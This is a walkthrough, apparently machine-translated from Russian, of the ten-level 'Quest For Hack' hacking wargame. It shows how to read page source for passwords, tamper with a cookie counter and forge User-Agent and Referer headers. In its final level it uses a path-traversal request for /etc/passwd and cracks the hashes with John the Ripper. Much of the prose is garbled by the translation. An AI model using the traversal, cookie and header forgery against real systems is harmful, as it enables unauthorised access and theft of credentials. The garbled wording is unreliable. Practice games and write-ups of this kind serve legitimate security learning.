Walkthrough for Quest For Hack

Quest For Hack is fun, like Try2Hack, created by our guys from GipsHackers Crew. Here is the link: http://quest.gipshack.ru/index.htm. At the request of one of the developer, the keys were not disclosed. Show only the route ...

Let's start with the source.
Guess the default administrative password. Here we hope none of the problems did not arise:

1) Additionally, the main level. YANDEX.
As we are also offered, we will use the form of administration. After that, we open the source page of the administration page. Additionally, look at the source of the script:

Function Test (passwd) {
If (passwd == ...
Window.alert ('ok. You hacked me');
Location.href = "

We substitute the received password, we press knopar, or we move on specified in location.href a link. All. The key to the next level is with us.

2) MICROSOFT
We look through the index.html. We observe the algorithm for comparing the username of the password, so we are looking for them. We observe an interesting line:
SCRIPT src = logo.gif
Enjoy this logo.gif. We get the username and password. We substitute the received data in the form. Hit Enter, get key ...

3) Matrix
Feiks we will not consider in any way .. Therefore, at once to the point. We go in the chat. We are looking at the source. We observe this line:
Param name = movie value = "passwd.swf".
Download this flash drive. Then either directly by some editor (not HEX), or a prog that tears the flash drive on the chasti. I opened in the editor (FAR). Watch the line with the word KEY .. Everything, the key is ...

4) Macromedia
Here everything is quite simple. We observe in the middle of a flash drive. It is allowed to swing (see sovs), but it is easier. In the Opera click the right button on the flush. We remove the daw Loop. Right click again. Click Forward. All. The key is with us.

5) Sun Microsystem
Go to Downloads. Download the file sunmicro.exe. We take every Resource explorer. I used the built-in ShadowScan. We are looking at resources. We find what we need. We save it as bmp. We open .., kei at us.

6) NASA
At us at a call at once blah blah the password is requested. We take a rocking chair (though FlashGet) download this index.html. Open it in the editor (notepad). We observe such lines:
Login = prompt ("Password protected., Enter login first:", "");
If (login ==
Again go to the page also enter what later login == without the quotes undoubtedly. We are on the page. Here we are offered to use the form of administration. We look at the sours. We see:
Input type = "reset" value = "enter here" onClick = "resultion (entr.login.value, entr.passwd.value, entr.NEWURL.value)"
Those. Our data is passed to the resolution function, we need to find its description: Watch the line:
Script language = Javascript src = base64.js
Watch this file. We observe the resolution function there. We are interested in two lines: var entrance = hexcode (login); Also if (password == entrance) It is clear that here the login must contain the hex code of what we entered in the password. I entered 49 -31. All. The key is ours.

7) FBI
At the main call to the page we get the following cookies:
Set-Cookie: cookietester = 1
We see the message: Come back again. So also we act. When updating the page from us leaves:
Cookie: cookietester = 1
Cookie2: $ Version = "1"
We get:
Set-Cookie: cookietester = 2.
We see You are only 1 times visit this page. Try until 3000 visits. We do it again. From us leaves:
Cookie: cookietester = 2
Cookie2: $ Version = "1"
We get:
Set-Cookie: cookietester = 3
The fact is that in the cookies we have hidden the counter of visits, i.e. How many times we visited the page. The line Try until 3000 visits, expresses to us that we need to go there 3000 times to get the key. At that time, we do so, changing the Cookie: cookietester = 2, to the Cookie: cookietester = 3000. In addition, go back to the page. We observe OK. The key for next level is ...
Those. To get the key we must specify how we have been here 3000 times. I made it this request (worked through a proxy):
GET http://quest.gipshack.ru/hackme/3/fbi/index.php HTTP / 1.0
User-Agent: Opera / 6.0 (Windows 2000; U) [en]
Host: quest.gipshack.ru
Accept: text / html, image / png, image / jpeg, image / gif, image / x-xbitmap, * / *
Accept-Language: en, en
Accept-Charset: windows-1252; q = 1.0, utf-8; q = 1.0; utf-16; q = 1.0; iso-8859-1; q = 0.6; *; q = 0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *; q = 0
Referer: http://quest.gipshack.ru/hackme/index.php
Cookie: cookietester = 3000
Cookie2: $ Version = "1"
Pragma: no-cache
Cache-Control: no-cache
Proxy-Connection: Keep-Alive

In the objection, instead of a bothersome message, the key is resorted;).

8) CIA
Everything is simple. Use exactly: Mozilla / 5.0 (compatible; Opera 7.01; UNIX). Those. Change the value of User-Agent: on Mozilla / 5.0 (compatible; Opera 7.01; UNIX). We get: Yor system is OK, but address, you came from, must be 212.215.125.126. Then we are asked to come with 212.215.125.126. We forge the variable Referer: 212.215.125.126. We go to the page again, also our key%).

9) White House
We go in. But we do not climb in any way as we were prompted to the administrative entrance. Otherwise, then we will have to solve one more problem;) We go at once to the input for users. There we get the error message: Warning: Too many connections to database 'db_user.inc'. Try to login later !. We substitute in db_user.inc. We look. Now make db_admin.inc. Here they are our login also password. Now we are boldly moving into the admission for admins and we also enter the received data. We get key.

10) Pentagon
Here also came down to the final level;). After they climbed, clicked, notice that in the user's input works the script view.pl, the parameter to which is the route to the file. Catching view the source admin.pl. Substituting, we get:
Http://gipshack.ru/cgi-bin/view.pl?path_to_file=admin.pl&Submit=View
We look. We see that fake, but it's also necessary. Here, as a hint, we show the main operation of the script. Understand the logic of the script. We observe that the user also passes the pass (according to the idea of ​​the creators of the game) from / etc / passwd. Trying to get it. View.pl? Path_to_file = / etc / passwd? Does not work. We try the relative path, we will become on view.pl?path_to_file=../../../etc/passwd, now work JTR. In 5 minutes he decrypts the password. The obtained data is substituted into the admin form. It seems we have passed =)

Do not think that everything was so easy. There were also feiks, there were rooms in which I wanted to get my head on Claudia 8). Simply here already ready solutions. But it's much more interesting to go all by yourself or with someone in the company, also this article is only for those who stood tight on any of the levels.
A common guys from GipsHackers Crew fellows. Continue to further develop your project! Good luck;).

PS
Thank you to all those with whom we shared this fun.

Author: r4ShRaY


The material is published with the permission of DHGROUP (http://www.dhgroup.org)